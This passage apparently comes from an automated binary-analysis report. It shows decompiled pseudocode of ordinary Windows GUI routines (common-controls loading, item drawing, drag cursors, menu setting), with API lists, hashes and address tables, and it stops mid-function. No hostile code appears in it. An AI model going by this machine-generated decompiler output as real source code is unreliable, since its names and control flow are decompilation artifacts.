                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                        • API String ID: 1646373207-3712701948
                                                                        • Opcode ID: e7fe911eb68f28c804d0767d7065684a7dc6f4c980445e1d1472f712646220be
                                                                        • Instruction ID: 6ae0bcb979b928d375a13ebc24deeef97ab0339ec59b2135f7a36ef93f1d17aa
                                                                        • Opcode Fuzzy Hash: e7fe911eb68f28c804d0767d7065684a7dc6f4c980445e1d1472f712646220be
                                                                        • Instruction Fuzzy Hash: 64D05EA020538A8ADB00FFB059C17153594C340708B04843BA106752D3C7BE49A0978E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004269FC() {
                                                                        				struct HINSTANCE__* _t1;
                                                                        				struct HINSTANCE__* _t2;
                                                                        				_Unknown_base(*)()* _t3;
                                                                        
                                                                        				if( *0x496a94 == 0) {
                                                                        					_t1 = GetModuleHandleA("comctl32.dll");
                                                                        					 *0x496a94 = _t1;
                                                                        					if( *0x496a94 != 0) {
                                                                        						_t2 =  *0x496a94; // 0x0
                                                                        						_t3 = GetProcAddress(_t2, "InitCommonControlsEx");
                                                                        						 *0x496a98 = _t3;
                                                                        						return _t3;
                                                                        					}
                                                                        				}
                                                                        				return _t1;
                                                                        			}







                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(comctl32.dll,00426A6D,00000200,0046CC12), ref: 00426A0A
                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00426A28
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: InitCommonControlsEx$comctl32.dll
                                                                        • API String ID: 1646373207-802336580
                                                                        • Opcode ID: d8e2ff409dd9ceddfd3946d5ebc7b870927ac2dbee9e64dd0fd436275be675c0
                                                                        • Instruction ID: b485c5e37fb782eca6cace4d01e2d249d426e4b814a2065c8112e2717f591e71
                                                                        • Opcode Fuzzy Hash: d8e2ff409dd9ceddfd3946d5ebc7b870927ac2dbee9e64dd0fd436275be675c0
                                                                        • Instruction Fuzzy Hash: 70D09EB06412529FE700EFA4BD467117790D323705FA3C43BA04976DB1D67C2454C70C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E00464658(char __eax, intOrPtr __ecx, void* __edx, void* _a8) {
                                                                        				char _v8;
                                                                        				intOrPtr _v12;
                                                                        				struct tagRECT _v28;
                                                                        				intOrPtr _v32;
                                                                        				struct HWND__* _v36;
                                                                        				signed short _v38;
                                                                        				char _v39;
                                                                        				char _v40;
                                                                        				signed int _v52;
                                                                        				void* __edi;
                                                                        				void* __ebp;
                                                                        				void* _t93;
                                                                        				struct HWND__* _t94;
                                                                        				signed int _t99;
                                                                        				signed int _t100;
                                                                        				signed int _t123;
                                                                        				struct HWND__* _t125;
                                                                        				signed int _t127;
                                                                        				signed int _t129;
                                                                        				void* _t131;
                                                                        				struct HWND__* _t144;
                                                                        				struct HWND__* _t145;
                                                                        				intOrPtr _t148;
                                                                        				void* _t152;
                                                                        				struct HWND__* _t153;
                                                                        				intOrPtr _t155;
                                                                        				intOrPtr _t159;
                                                                        				struct HWND__* _t196;
                                                                        				struct HWND__* _t200;
                                                                        				long _t209;
                                                                        				struct HWND__** _t212;
                                                                        				void* _t213;
                                                                        
                                                                        				_t180 = __ecx;
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				_v32 = __ecx;
                                                                        				_v8 = __eax;
                                                                        				_t212 =  &_v8;
                                                                        				_t93 = E00461DEC( *((intOrPtr*)( *_t212 + 0x29c)));
                                                                        				_t214 =  *((intOrPtr*)(_t93 + 8));
                                                                        				if( *((intOrPtr*)(_t93 + 8)) == 0) {
                                                                        					E0041FC50( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), __ecx,  *((intOrPtr*)( *_t212 + 0x70)),  &_v28, _t213, _t214);
                                                                        					return E004202E8( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
                                                                        				}
                                                                        				_t94 =  *_t212;
                                                                        				__eflags =  *((char*)(_t94 + 0x2e8)) - 1;
                                                                        				if( *((char*)(_t94 + 0x2e8)) != 1) {
                                                                        					L10:
                                                                        					_t209 = _v28.left;
                                                                        					_v36 = E004641C0( *_t212, _v32);
                                                                        					_t99 = _v28.bottom - _v28.top -  *((intOrPtr*)( *_t212 + 0x2b0));
                                                                        					__eflags = _t99;
                                                                        					_t100 = _t99 >> 1;
                                                                        					if(__eflags < 0) {
                                                                        						asm("adc eax, 0x0");
                                                                        					}
                                                                        					_v52 = _t100;
                                                                        					_t173 =  *((intOrPtr*)( *_t212 + 0x208));
                                                                        					E0042062C( *((intOrPtr*)( *_t212 + 0x208)));
                                                                        					E0041FC50( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), _t180,  *((intOrPtr*)( *_t212 + 0x70)), _t209, _t213, __eflags);
                                                                        					E004202E8( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
                                                                        					_v12 = E0042056C(_t173,  *((intOrPtr*)(_v36 + 8))) + 1;
                                                                        					__eflags =  *( *_t212 + 0x22c) - _v32;
                                                                        					if(__eflags == 0) {
                                                                        						E0041FC50( *((intOrPtr*)(_t173 + 0x14)), _t180, 0x8000000d, _t209, _t213, __eflags);
                                                                        						E0041F464( *((intOrPtr*)(_t173 + 0xc)), 0x8000000e);
                                                                        					}
                                                                        					_v40 =  *((intOrPtr*)(_v36 + 0x18));
                                                                        					_v39 = E004627C4(_v36);
                                                                        					_v38 = E00461ED8(_v36);
                                                                        					_t123 =  *( *_t212 + 0x2e0) & 0x000000ff;
                                                                        					__eflags = _t123 - 5;
                                                                        					if(__eflags > 0) {
                                                                        						L22:
                                                                        						_t125 =  *( *_t212 + 0x22c);
                                                                        						__eflags = _t125 - _v32;
                                                                        						if(_t125 != _v32) {
                                                                        							goto L35;
                                                                        						}
                                                                        						_t125 = _v36;
                                                                        						__eflags =  *(_t125 + 8);
                                                                        						if( *(_t125 + 8) == 0) {
                                                                        							goto L35;
                                                                        						}
                                                                        						_t127 =  *( *_t212 + 0x234);
                                                                        						_v28.left = _t209 + _t127 * ((_v38 & 0x0000ffff) - 1);
                                                                        						_t196 =  *_t212;
                                                                        						__eflags =  *((char*)(_t196 + 0x2e0)) - 4;
                                                                        						if( *((char*)(_t196 + 0x2e0)) >= 4) {
                                                                        							_v28.left = _v28.left - _v52;
                                                                        							_t200 =  *_t212;
                                                                        							__eflags =  *(_t200 + 0x2e9) & 0x00000001;
                                                                        							if(( *(_t200 + 0x2e9) & 0x00000001) != 0) {
                                                                        								_t76 =  &_v28;
                                                                        								 *_t76 = _v28.left + _t127;
                                                                        								__eflags =  *_t76;
                                                                        							}
                                                                        						}
                                                                        						_t129 =  *( *_t212 + 0x2e0);
                                                                        						__eflags = _t129;
                                                                        						if(_t129 != 0) {
                                                                        							__eflags = _t129 - 4;
                                                                        							if(_t129 != 4) {
                                                                        								_t80 =  &_v28;
                                                                        								 *_t80 = _v28.left +  *( *_t212 + 0x234);
                                                                        								__eflags =  *_t80;
                                                                        							}
                                                                        						}
                                                                        						__eflags = _t129 - 3;
                                                                        						if(_t129 == 3) {
                                                                        							_t83 =  &_v28;
                                                                        							 *_t83 = _v28.left +  *( *_t212 + 0x234);
                                                                        							__eflags =  *_t83;
                                                                        						}
                                                                        						_t131 = E0043CC2C( *_t212);
                                                                        						_t125 = GetFocus();
                                                                        						__eflags = _t131 - _t125;
                                                                        						if(_t131 != _t125) {
                                                                        							goto L35;
                                                                        						} else {
                                                                        							_t125 =  *_t212;
                                                                        							__eflags =  *(_t125 + 0x2e9) & 0x00000002;
                                                                        							if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
                                                                        								goto L35;
                                                                        							}
                                                                        							return DrawFocusRect(E00420730( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
                                                                        						}
                                                                        					} else {
                                                                        						switch( *((intOrPtr*)(_t123 * 4 +  &M00464838))) {
                                                                        							case 0:
                                                                        								E00464230(_t213);
                                                                        								goto L22;
                                                                        							case 1:
                                                                        								__eax = E0046443C(__edi, __esi, __ebp);
                                                                        								goto L22;
                                                                        							case 2:
                                                                        								__eax = E0046438C(__edi, __ebp);
                                                                        								goto L22;
                                                                        							case 3:
                                                                        								__eax = E00464280(__edi, __esi, __ebp);
                                                                        								goto L22;
                                                                        							case 4:
                                                                        								__eax = E004644EC(__edi, __esi, __eflags, __ebp);
                                                                        								goto L22;
                                                                        							case 5:
                                                                        								__eax = E00464574(__edi, __eflags, __ebp);
                                                                        								goto L22;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_t144 =  *_t212;
                                                                        					__eflags =  *((short*)(_t144 + 0x2f2));
                                                                        					if( *((short*)(_t144 + 0x2f2)) == 0) {
                                                                        						goto L10;
                                                                        					}
                                                                        					_t145 =  *_t212;
                                                                        					__eflags =  *((intOrPtr*)(_t145 + 0x22c)) - _v32;
                                                                        					if( *((intOrPtr*)(_t145 + 0x22c)) != _v32) {
                                                                        						_t148 =  *0x464948; // 0x0
                                                                        						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t148,  &_v28);
                                                                        					}
                                                                        					_t152 = E0043CC2C( *_t212);
                                                                        					_t153 = GetFocus();
                                                                        					__eflags = _t152 - _t153;
                                                                        					if(_t152 != _t153) {
                                                                        						_t155 =  *0x464944; // 0x1
                                                                        						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t155,  &_v28);
                                                                        					}
                                                                        					_t159 =  *0x464940; // 0x11
                                                                        					 *((intOrPtr*)( *_t212 + 0x2f0))(_t159,  &_v28);
                                                                        					_t125 =  *_t212;
                                                                        					__eflags =  *(_t125 + 0x2e9) & 0x00000002;
                                                                        					if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
                                                                        						L35:
                                                                        						return _t125;
                                                                        					}
                                                                        					return DrawFocusRect(E00420730( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
                                                                        				}
                                                                        			}



































                                                                        0x00464875
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0046487e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00464831
                                                                        0x004646ba
                                                                        0x004646ba
                                                                        0x004646bc
                                                                        0x004646c4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004646ca
                                                                        0x004646d2
                                                                        0x004646d5
                                                                        0x00464759
                                                                        0x00000000
                                                                        0x0046476d
                                                                        0x004646d9
                                                                        0x004646e0
                                                                        0x004646e5
                                                                        0x004646e7
                                                                        0x00464736
                                                                        0x00000000
                                                                        0x0046474a
                                                                        0x004646ed
                                                                        0x00464701
                                                                        0x00464707
                                                                        0x00464709
                                                                        0x00464710
                                                                        0x0046493c
                                                                        0x0046493c
                                                                        0x0046493c
                                                                        0x00000000
                                                                        0x00464728

                                                                        APIs
                                                                        • GetFocus.USER32 ref: 004646E0
                                                                        • DrawFocusRect.USER32 ref: 00464728
                                                                          • Part of subcall function 004202E8: FillRect.USER32 ref: 00420310
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FocusRect$DrawFill
                                                                        • String ID:
                                                                        • API String ID: 3476037706-0
                                                                        • Opcode ID: bd1cc9d83fbb64b7a4748703e1cad8a8f26c1da09dfb4c53e68ded7458c0d174
                                                                        • Instruction ID: 2e9b2cd7af3be85b1ad5ab87c8741589f721a3b3221bc1c176d7526e71f5910d
                                                                        • Opcode Fuzzy Hash: bd1cc9d83fbb64b7a4748703e1cad8a8f26c1da09dfb4c53e68ded7458c0d174
                                                                        • Instruction Fuzzy Hash: 83916F34A00145CFCB10EF68C485EAEB7F5BF99314F2445BAE5849B326E738AC45CB99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E004344BC(intOrPtr* __eax, signed int __edx) {
                                                                        				intOrPtr _v16;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				char _v28;
                                                                        				intOrPtr _t49;
                                                                        				intOrPtr _t50;
                                                                        				intOrPtr _t53;
                                                                        				intOrPtr _t54;
                                                                        				intOrPtr _t55;
                                                                        				intOrPtr _t56;
                                                                        				intOrPtr* _t60;
                                                                        				intOrPtr* _t62;
                                                                        				struct HICON__* _t65;
                                                                        				intOrPtr _t67;
                                                                        				intOrPtr* _t72;
                                                                        				intOrPtr _t74;
                                                                        				intOrPtr* _t75;
                                                                        				intOrPtr _t78;
                                                                        				intOrPtr _t80;
                                                                        				intOrPtr _t82;
                                                                        				intOrPtr _t84;
                                                                        				intOrPtr _t85;
                                                                        				struct HWND__* _t88;
                                                                        				intOrPtr _t89;
                                                                        				intOrPtr _t91;
                                                                        				intOrPtr* _t93;
                                                                        				intOrPtr _t97;
                                                                        				intOrPtr _t100;
                                                                        				intOrPtr _t102;
                                                                        				intOrPtr _t103;
                                                                        				intOrPtr _t104;
                                                                        				intOrPtr _t106;
                                                                        				struct HWND__* _t107;
                                                                        				intOrPtr _t108;
                                                                        				intOrPtr _t110;
                                                                        				intOrPtr _t114;
                                                                        				intOrPtr _t117;
                                                                        				char _t118;
                                                                        				intOrPtr _t119;
                                                                        				void* _t131;
                                                                        				intOrPtr _t135;
                                                                        				intOrPtr _t140;
                                                                        				intOrPtr* _t155;
                                                                        				void* _t158;
                                                                        				void* _t165;
                                                                        				void* _t166;
                                                                        
                                                                        				_t155 = __eax;
                                                                        				if( *0x496ba8 != 0) {
                                                                        					L3:
                                                                        					_t49 =  *0x496b88; // 0x0
                                                                        					_t50 =  *0x496b88; // 0x0
                                                                        					_t117 = E0043439C(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
                                                                        					if( *0x496ba8 == 0) {
                                                                        						_t168 =  *0x496bac;
                                                                        						if( *0x496bac != 0) {
                                                                        							_t106 =  *0x496b9c; // 0x0
                                                                        							_t107 = GetDesktopWindow();
                                                                        							_t108 =  *0x496bac; // 0x0
                                                                        							E0043E5DC(_t108, _t107, _t168, _t106);
                                                                        						}
                                                                        					}
                                                                        					_t53 =  *0x496b88; // 0x0
                                                                        					if( *((char*)(_t53 + 0x9b)) != 0) {
                                                                        						__eflags =  *0x496ba8;
                                                                        						_t6 =  &_v24;
                                                                        						 *_t6 =  *0x496ba8 != 0;
                                                                        						__eflags =  *_t6;
                                                                        						 *0x496ba8 = 2;
                                                                        					} else {
                                                                        						 *0x496ba8 = 1;
                                                                        						_v24 = 0;
                                                                        					}
                                                                        					_t54 =  *0x496b8c; // 0x0
                                                                        					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
                                                                        						L12:
                                                                        						_t55 =  *0x496b8c; // 0x0
                                                                        						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
                                                                        						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                                                        						_t56 =  *0x496b8c; // 0x0
                                                                        						if( *((intOrPtr*)(_t56 + 4)) != 0) {
                                                                        							_t97 =  *0x496b8c; // 0x0
                                                                        							E004360F0( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
                                                                        							_t100 =  *0x496b8c; // 0x0
                                                                        							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
                                                                        							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
                                                                        						}
                                                                        						_t131 = E004343EC(2);
                                                                        						_t121 =  *_t155;
                                                                        						_t60 =  *0x496b8c; // 0x0
                                                                        						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
                                                                        						if( *0x496bac != 0) {
                                                                        							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
                                                                        								_t82 =  *0x496bac; // 0x0
                                                                        								E0043E598(_t82, _t158);
                                                                        								_t84 =  *0x496bac; // 0x0
                                                                        								_t177 =  *((char*)(_t84 + 0x6a));
                                                                        								if( *((char*)(_t84 + 0x6a)) != 0) {
                                                                        									_t121 =  *((intOrPtr*)(_t155 + 4));
                                                                        									_t85 =  *0x496bac; // 0x0
                                                                        									E0043E6C4(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
                                                                        								} else {
                                                                        									_t88 = GetDesktopWindow();
                                                                        									_t121 =  *_t155;
                                                                        									_t89 =  *0x496bac; // 0x0
                                                                        									E0043E5DC(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
                                                                        								}
                                                                        							} else {
                                                                        								_t91 =  *0x496bac; // 0x0
                                                                        								E0043E738(_t91, _t131, __eflags);
                                                                        								_t93 =  *0x495c2c; // 0x496c08
                                                                        								SetCursor(E0045469C( *_t93, _t158));
                                                                        							}
                                                                        						}
                                                                        						_t62 =  *0x495c2c; // 0x496c08
                                                                        						_t65 = SetCursor(E0045469C( *_t62, _t158));
                                                                        						if( *0x496ba8 != 2) {
                                                                        							L32:
                                                                        							return _t65;
                                                                        						} else {
                                                                        							_t179 = _t117;
                                                                        							if(_t117 != 0) {
                                                                        								_t118 = E00434428(_t121);
                                                                        								_t67 =  *0x496b8c; // 0x0
                                                                        								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
                                                                        								__eflags = _t118;
                                                                        								if(__eflags != 0) {
                                                                        									E004360F0(_t118,  &_v24, _t155);
                                                                        									_t65 = E004037D8(_t118, __eflags);
                                                                        									_t135 =  *0x496b8c; // 0x0
                                                                        									 *(_t135 + 0x54) = _t65;
                                                                        								} else {
                                                                        									_t78 =  *0x496b8c; // 0x0
                                                                        									_t65 = E004037D8( *((intOrPtr*)(_t78 + 4)), __eflags);
                                                                        									_t140 =  *0x496b8c; // 0x0
                                                                        									 *(_t140 + 0x54) = _t65;
                                                                        								}
                                                                        							} else {
                                                                        								_push( *((intOrPtr*)(_t155 + 4)));
                                                                        								_t80 =  *0x496b8c; // 0x0
                                                                        								_t65 = E004037D8( *((intOrPtr*)(_t80 + 0x38)), _t179);
                                                                        							}
                                                                        							if( *0x496b8c == 0) {
                                                                        								goto L32;
                                                                        							} else {
                                                                        								_t119 =  *0x496b8c; // 0x0
                                                                        								_t41 = _t119 + 0x5c; // 0x5c
                                                                        								_t42 = _t119 + 0x44; // 0x44
                                                                        								_t65 = E00408514(_t42, 0x10, _t41);
                                                                        								if(_t65 != 0) {
                                                                        									goto L32;
                                                                        								}
                                                                        								if(_v28 != 0) {
                                                                        									_t75 =  *0x496b8c; // 0x0
                                                                        									 *((intOrPtr*)( *_t75 + 0x34))();
                                                                        								}
                                                                        								_t72 =  *0x496b8c; // 0x0
                                                                        								 *((intOrPtr*)( *_t72 + 0x30))();
                                                                        								_t74 =  *0x496b8c; // 0x0
                                                                        								asm("movsd");
                                                                        								asm("movsd");
                                                                        								asm("movsd");
                                                                        								asm("movsd");
                                                                        								return _t74;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					_t65 = E004343EC(1);
                                                                        					if( *0x496b8c == 0) {
                                                                        						goto L32;
                                                                        					}
                                                                        					_t102 =  *0x496b8c; // 0x0
                                                                        					 *((intOrPtr*)(_t102 + 4)) = _t117;
                                                                        					_t103 =  *0x496b8c; // 0x0
                                                                        					 *((intOrPtr*)(_t103 + 8)) = _v28;
                                                                        					_t104 =  *0x496b8c; // 0x0
                                                                        					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
                                                                        					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                                                        					_t65 = E004343EC(0);
                                                                        					if( *0x496b8c == 0) {
                                                                        						goto L32;
                                                                        					}
                                                                        					goto L12;
                                                                        				}
                                                                        				_t110 =  *0x496b98; // 0x0
                                                                        				asm("cdq");
                                                                        				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x496ba4; // 0x0
                                                                        				if(_t165 >= 0) {
                                                                        					goto L3;
                                                                        				}
                                                                        				_t114 =  *0x496b9c; // 0x0
                                                                        				asm("cdq");
                                                                        				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
                                                                        				_t166 = _t65 -  *0x496ba4; // 0x0
                                                                        				if(_t166 < 0) {
                                                                        					goto L32;
                                                                        				}
                                                                        				goto L3;
                                                                        			}

                                                                        0x004346be
                                                                        0x004346df
                                                                        0x004346e1
                                                                        0x004346e6
                                                                        0x004346e9
                                                                        0x004346eb
                                                                        0x00434719
                                                                        0x00434728
                                                                        0x0043472d
                                                                        0x00434733
                                                                        0x004346ed
                                                                        0x004346f5
                                                                        0x00434701
                                                                        0x00434706
                                                                        0x0043470c
                                                                        0x0043470c
                                                                        0x004346c0
                                                                        0x004346c3
                                                                        0x004346c6
                                                                        0x004346d3
                                                                        0x004346d3
                                                                        0x0043473d
                                                                        0x00000000
                                                                        0x0043473f
                                                                        0x0043473f
                                                                        0x00434745
                                                                        0x00434748
                                                                        0x00434750
                                                                        0x00434757
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043475e
                                                                        0x00434760
                                                                        0x00434767
                                                                        0x00434767
                                                                        0x0043476a
                                                                        0x00434771
                                                                        0x00434774
                                                                        0x0043477f
                                                                        0x00434780
                                                                        0x00434781
                                                                        0x00434782
                                                                        0x00000000
                                                                        0x00434782
                                                                        0x0043473d
                                                                        0x004346b6
                                                                        0x00434582
                                                                        0x0043458e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00434594
                                                                        0x00434599
                                                                        0x0043459c
                                                                        0x004345a4
                                                                        0x004345a7
                                                                        0x004345ae
                                                                        0x004345b4
                                                                        0x004345b9
                                                                        0x004345c5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004345c5
                                                                        0x004344cd
                                                                        0x004344d4
                                                                        0x004344d9
                                                                        0x004344df
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004344e1
                                                                        0x004344e9
                                                                        0x004344ec
                                                                        0x004344ee
                                                                        0x004344f4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • GetDesktopWindow.USER32 ref: 00434530
                                                                        • GetDesktopWindow.USER32 ref: 00434655
                                                                        • SetCursor.USER32(00000000), ref: 004346AA
                                                                          • Part of subcall function 0043E738: 73451770.COMCTL32(00000000,?,00434685), ref: 0043E754
                                                                          • Part of subcall function 0043E738: ShowCursor.USER32(000000FF,00000000,?,00434685), ref: 0043E76F
                                                                        • SetCursor.USER32(00000000), ref: 00434695
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Cursor$DesktopWindow$73451770Show
                                                                        • String ID:
                                                                        • API String ID: 3513720257-0
                                                                        • Opcode ID: 0908ce388f1a167bea320882a453395eb452e286a3d3486925d54d05bbf51521
                                                                        • Instruction ID: 60a87f57ea885684c14f26adc1ba0dcb8032ffab10c766f9e9c89d1009de8357
                                                                        • Opcode Fuzzy Hash: 0908ce388f1a167bea320882a453395eb452e286a3d3486925d54d05bbf51521
                                                                        • Instruction Fuzzy Hash: 2191AEB42002519FC700DF69D885A46B7E5ABA9318F16D47BE808CB3B2E739FC45CB49
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E00450AA0(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                        				char _v8;
                                                                        				char _v12;
                                                                        				char _v16;
                                                                        				char _v20;
                                                                        				void* _t41;
                                                                        				void* _t54;
                                                                        				void* _t61;
                                                                        				struct HMENU__* _t64;
                                                                        				struct HMENU__* _t70;
                                                                        				intOrPtr _t77;
                                                                        				void* _t79;
                                                                        				intOrPtr _t81;
                                                                        				intOrPtr _t83;
                                                                        				intOrPtr _t87;
                                                                        				void* _t92;
                                                                        				intOrPtr _t98;
                                                                        				void* _t111;
                                                                        				intOrPtr _t113;
                                                                        				void* _t116;
                                                                        
                                                                        				_t109 = __edi;
                                                                        				_push(__edi);
                                                                        				_v20 = 0;
                                                                        				_t113 = __edx;
                                                                        				_t92 = __eax;
                                                                        				_push(_t116);
                                                                        				_push(0x450c66);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t116 + 0xfffffff0;
                                                                        				if(__edx == 0) {
                                                                        					L7:
                                                                        					_t39 =  *((intOrPtr*)(_t92 + 0x248));
                                                                        					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
                                                                        						E00449D44(_t39, 0, _t109, 0);
                                                                        					}
                                                                        					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
                                                                        						_t113 = 0;
                                                                        					}
                                                                        					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
                                                                        					if(_t113 != 0) {
                                                                        						E0041C2AC(_t113, _t92);
                                                                        					}
                                                                        					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
                                                                        						_t41 = E0043CF30(_t92);
                                                                        						__eflags = _t41;
                                                                        						if(_t41 != 0) {
                                                                        							SetMenu(E0043CC2C(_t92), 0);
                                                                        						}
                                                                        						goto L30;
                                                                        					} else {
                                                                        						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
                                                                        							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
                                                                        								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
                                                                        								if( *((char*)(_t92 + 0x22f)) != 1) {
                                                                        									_t54 = E0043CF30(_t92);
                                                                        									__eflags = _t54;
                                                                        									if(_t54 != 0) {
                                                                        										SetMenu(E0043CC2C(_t92), 0);
                                                                        									}
                                                                        								}
                                                                        								goto L30;
                                                                        							}
                                                                        							goto L21;
                                                                        						} else {
                                                                        							L21:
                                                                        							if(E0043CF30(_t92) != 0) {
                                                                        								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                                                        								_t110 = _t61;
                                                                        								_t64 = GetMenu(E0043CC2C(_t92));
                                                                        								_t138 = _t61 - _t64;
                                                                        								if(_t61 != _t64) {
                                                                        									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                                                        									SetMenu(E0043CC2C(_t92), _t70);
                                                                        								}
                                                                        								E00449D44(_t113, E0043CC2C(_t92), _t110, _t138);
                                                                        							}
                                                                        							L30:
                                                                        							if( *((char*)(_t92 + 0x22e)) != 0) {
                                                                        								E00451B60(_t92, 1);
                                                                        							}
                                                                        							E004509D8(_t92);
                                                                        							_pop(_t98);
                                                                        							 *[fs:eax] = _t98;
                                                                        							_push(0x450c6d);
                                                                        							return E00404348( &_v20);
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t77 =  *0x496c08; // 0x215094c
                                                                        				_t79 = E00454224(_t77) - 1;
                                                                        				if(_t79 >= 0) {
                                                                        					_v8 = _t79 + 1;
                                                                        					_t111 = 0;
                                                                        					do {
                                                                        						_t81 =  *0x496c08; // 0x215094c
                                                                        						if(_t113 ==  *((intOrPtr*)(E00454210(_t81, _t111) + 0x248))) {
                                                                        							_t83 =  *0x496c08; // 0x215094c
                                                                        							if(_t92 != E00454210(_t83, _t111)) {
                                                                        								_v16 =  *((intOrPtr*)(_t113 + 8));
                                                                        								_v12 = 0xb;
                                                                        								_t87 =  *0x495938; // 0x41d7a4
                                                                        								E00406548(_t87,  &_v20);
                                                                        								E0040A1B8(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
                                                                        								E00403DA8();
